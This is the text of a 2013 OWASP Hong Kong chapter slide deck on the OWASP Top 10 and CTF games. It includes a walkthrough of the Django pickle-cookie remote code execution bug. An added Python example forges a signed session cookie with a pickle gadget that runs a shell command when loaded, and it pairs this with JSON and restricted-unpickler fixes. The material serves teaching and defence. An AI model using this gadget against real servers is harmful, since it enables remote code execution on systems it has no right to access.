Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
OWASP Half-Day Event
(Hong Kong Chapter)
Anthony LAI
Chapter Leader
{Alan HO, Zetta KE}
Chapter Researcher
OWASP (Hong Kong Chapter)
July 2013
OWASP Standard
Web application security and awareness
Top 10, coding guidelines and tools
A well-known industry standard, established for nearly 10 years.
A good reference for web application developers, security officers, penetration testers, IT security management, compliance officers and auditors.
OWASP Membership and Our Approach
Membership launched
APAC Chapters: 20 USD per year for an individual member (an absolute bargain!)
Corporate members are welcome (5000 USD per year)
We commit to giving 3-4 half-day events per year
From the next seminar, only paid members can join the events.
No bullshit, no sales talk, no starch: practical work and research. :-)
RIP Barnaby Jack. He passed away in San Francisco shortly before Black Hat, where he was due to disclose his hack against heart pacemakers.
Speaker Profiles
Speaker Biography and Introduction
Alan HO
Has worked as an application security specialist
Experienced developer
Passionate about Android and web hacking
VXRL security researcher and CTF crew member
SANS GWAPT (Gold paper) holder
Speaker Biography and Introduction
Zetta KE
PhD student in Information Systems at HKUST
VXRL researcher and CTF MVP (Most Valuable Player)
Passionate about web hacking, crypto and PHP
Leads web hacking and penetration testing workshops at the Polytechnic University and HKPC with Anthony Lai.
Speaker Biography and Introduction
Anthony LAI
Chapter Leader, OWASP HK Chapter
Founder and Researcher, VXRL
Focuses on penetration testing, reverse engineering, malware analysis and incident response.
Passionate about CTF wargames
Has spoken at DEFCON 18-20, Black Hat USA 2010, AVTokyo 2011-2012, HITCON 2010-2011, Codegate 2012 and HTCIA APAC Conference 2012
SANS GWAPT, GREM and GCFA mentor
Agenda
Introduction (10 minutes)
OWASP Top 10 2013 Update (Anthony) (15-20 minutes)
XSS flaws in mobile phone browsers (Alan) (30-40 minutes)
Break (15 minutes)
Length Extension Attack (Zetta) (30-40 minutes)
CTF for fun and profit (Anthony) (15-20 minutes)
OWASP Top 10 2013 Update
Anthony LAI
Chapter Leader
OWASP (Hong Kong Chapter)
anthonylai@owasp.org
July 2013
We have an update this year
OWASP Top 10: 2010 Vs 2013
How to interpret each Top 10 item?
Threat, vulnerability and risk
How to interpret each Top 10 item?
Exposure, vulnerable scenario, fix and references
OWASP Top 10 Details and Follow-up
Left to you to read through
It is a process you must walk through:
Identify the top items that apply to the web applications you manage or own.
Implement guidelines and policy with reference to the OWASP standard.
Alan's show time: Mobile Phone Browser XSS
(SANS Gold paper published)
Break Time: 15 minutes
Relax a bit … :)
Zetta's show time: Length Extension Attack (LEA)
CTF (Capture The Flag) for Fun and Profit
What is a CTF game?
You need to get the key (flag) for points
Challenges include crypto, network, forensics, binary/reverse engineering/exploitation, web hacking and miscellaneous.
Top teams can enter the final round of the contest
DEFCON, Plaid CTF, Codegate and Secuinside are the famous CTFs on the planet, and we join every year.
Why do we enjoy playing?
Challenges are practical
They need your knowledge
They need your skills
Understanding vulnerabilities
Thinking like an attacker
They train you to use the right tools
Our rank? Any rewards?
www.ctftime.org
4th place in HITCON CTF 2013 (19-20 July, Taipei)
Our world ranking
Sample Question (1)
Please read the following code. How would you solve it?
Question 1
There are a couple of things to note:
We must perform the operations in reverse order, since what we are writing is the inverse function.
The hex2bin function is only available in PHP >= 5.4.0. We had to resort to the documentation to find the alternative that works on older versions: pack("H*", $str)
Sample Question (2)
How about this? Let us do it together:
http://natas14.natas.labs.overthewire.org/
Sample Question (2)
Remember the basics :)
Question (3) – Django RCE Vulnerability
HITCON 2013 Pwn500 question
Django Remote Code Execution (RCE) vulnerability
Django's signed-cookie session backend used Python's Pickle library to serialize the session object into a string; the string is then signed with the secret key and stored in the cookie. The reverse action is called "unpickling".
However, Pickle has always trusted the data passed to it without validation: unpickling calls whatever importable callables the data names. So the signature only proves that the cookie was produced by someone holding the key; it does not make the payload safe to unpickle.
Discovered in 2011.
A Vulnerable Django
https://github.com/OrangeTW/Vulnerable-Django/
If the key leaks
We can generate our own cookie and sign it ourselves.
We can even include command execution:
1. Generate and sign a new cookie whose payload carries the command execution.
2. Replace the original cookie with the generated one.
Pwned :)
(Simply enter Guest, type some text in the box and submit)
More than that, by changing our command to read a file instead, we can obtain the key from the server itself ...
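The exploit chain above, as an added example in Python; this is not the challenge's code, not Django's, and not the Vulnerable-Django repository's. The cookie format, the key and the command are constructed stand-ins: the real Django signer salts the key and encodes the MAC differently, but the property it demonstrates is the same. The signature proves only that the holder of SECRET_KEY produced the cookie, and the pickle serializer then executes whatever callables the payload names. The two hardened loaders at the end are the fixes a practitioner would choose between: the JSON serializer that Django made the default in 1.6, or a restricted unpickler for legacy pickled data.

```python
import base64
import hashlib
import hmac
import io
import json
import pickle
import subprocess

# Constructed stand-in for Django's SECRET_KEY; in the challenge this is
# the value that leaks from the server.
SECRET_KEY = b"constructed-leaked-secret-key"


def sign(payload: bytes, key: bytes) -> str:
    """Sign raw session bytes as base64(payload):hex(HMAC-SHA1).

    Simplified model of a Django signed cookie (assumption: the real
    format salts the key and base64-encodes the MAC, which changes
    nothing about the attack).
    """
    mac = hmac.new(key, payload, hashlib.sha1).hexdigest()
    return base64.urlsafe_b64encode(payload).decode() + ":" + mac


def verify(cookie: str, key: bytes) -> bytes:
    """Check the MAC and return the raw session bytes, or raise ValueError."""
    data_b64, sep, mac = cookie.rpartition(":")
    if not sep:
        raise ValueError("malformed cookie")
    payload = base64.urlsafe_b64decode(data_b64)
    expected = hmac.new(key, payload, hashlib.sha1).hexdigest()
    if not hmac.compare_digest(expected, mac):
        raise ValueError("bad signature")
    return payload


# --- Vulnerable: pickle serializer (the pre-1.6 Django default) ------------

def dump_session_pickle(session: dict, key: bytes) -> str:
    return sign(pickle.dumps(session), key)


def load_session_pickle(cookie: str, key: bytes):
    # The MAC proves the cookie was minted with the key, nothing more;
    # pickle.loads then runs whatever callables the payload names.
    return pickle.loads(verify(cookie, key))


class RunCommand:
    """Attacker gadget: unpickling rebuilds it as subprocess.check_output(cmd)."""

    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        return (subprocess.check_output, (self.cmd,))


def forge_cookie(cmd: list, key: bytes) -> str:
    """Step 1 from the slides: sign a cookie whose payload executes cmd."""
    return sign(pickle.dumps(RunCommand(cmd)), key)


# --- Hardened ---------------------------------------------------------------

def dump_session_json(session: dict, key: bytes) -> str:
    return sign(json.dumps(session).encode(), key)


def load_session_json(cookie: str, key: bytes) -> dict:
    # JSON yields only dicts, lists, strings, numbers and booleans: no callables.
    return json.loads(verify(cookie, key).decode())


class RestrictedUnpickler(pickle.Unpickler):
    """If pickle must stay (legacy cookies), allow only a fixed set of globals."""

    ALLOWED = {("builtins", "dict"), ("builtins", "list"),
               ("builtins", "str"), ("builtins", "int")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def load_session_restricted(cookie: str, key: bytes):
    return RestrictedUnpickler(io.BytesIO(verify(cookie, key))).load()


def rejects(loader, cookie: str, key: bytes) -> bool:
    """True if the loader refuses the cookie instead of deserialising it."""
    try:
        loader(cookie, key)
    except (ValueError, pickle.UnpicklingError):
        return True
    return False


if __name__ == "__main__":
    legit = dump_session_pickle({"name": "Guest"}, SECRET_KEY)
    print("legit session:", load_session_pickle(legit, SECRET_KEY))
    forged = forge_cookie(["echo", "pwned"], SECRET_KEY)
    print("wrong key rejected:", rejects(load_session_pickle, forged, b"other-key"))
    print("leaked key, pickle loader runs the command:", load_session_pickle(forged, SECRET_KEY))
    print("leaked key, restricted loader rejects:", rejects(load_session_restricted, forged, SECRET_KEY))
    print("leaked key, JSON loader rejects:", rejects(load_session_json, forged, SECRET_KEY))
```

Note that without the key the forged cookie fails the MAC check, which is why the slides' attack starts from a leaked key; the pickle gadget is what turns "can mint a valid cookie" into "can run a command". Swapping the serializer removes the gadget entirely, and the restricted unpickler is only a fallback for data that cannot be migrated.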
CTF Fun and Profit
The fun is practising our security "kung fu".
The profit is earning knowledge and building trust and friendship.
Sometimes we even get a reward :)
Thank you for listening
anthonylai@owasp.org
alanh0@vxrl.org
Ozetta@vxrl.org
P.S.: Non-members are not guaranteed to get the slides; it depends on whether the speakers are willing to share them.

OWASP Top 10 2013 x CTF Fun and Profit
